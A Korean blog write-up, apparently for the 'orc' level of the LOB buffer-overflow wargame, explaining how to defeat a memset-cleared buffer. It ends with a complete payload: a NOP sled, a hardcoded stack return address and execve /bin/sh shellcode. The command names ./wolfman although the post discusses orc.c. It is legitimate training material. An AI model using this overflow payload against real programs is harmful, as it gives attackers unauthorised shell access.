반응형
orc.c를 열어보자.
//buffer hunter 까지는 앞에 goblin 문제와 소스가 동일하다.
궁금하다면 goblin 풀이 포스팅을 보시길..
buffer hunter에 대해서 memset(buffer,0,40);
소스가 추가된다. memset함수는 앞전에 설명했듯이 초기화 시키는 것..
buffer의 주소부터 40만큼 0을 채워넣는다는 얘기다.
이전 공격과 마찬가지로.. argv[2]에 셸코드를 넣으면 RET위에 셸코드가 올라가는 것이므로
버퍼가 초기화 되어도 굳이 문제될것이 없다..
설명안해도 될거라..생각된다. goblin과 똑같다.. 페이로드는
./wolfman `perl -e 'print "\x90"x44,"\xd0\x75\xfe\xbf"'` `perl -e 'print "\x90"x100000,
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53
\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
반응형
'IT 그리고 정보보안 > Write-up' 카테고리의 다른 글
| LOB Level 7 (Darkelf) (0) | 2021.04.12 |
|---|---|
| LOB Level 6 (Wolfman) (0) | 2021.04.12 |
| LOB Level 4 (goblin) (0) | 2021.04.12 |
| LOB Level 3 (Cobolt) (0) | 2021.04.11 |
| LOB Level 2 (Gremlin) (0) | 2021.04.11 |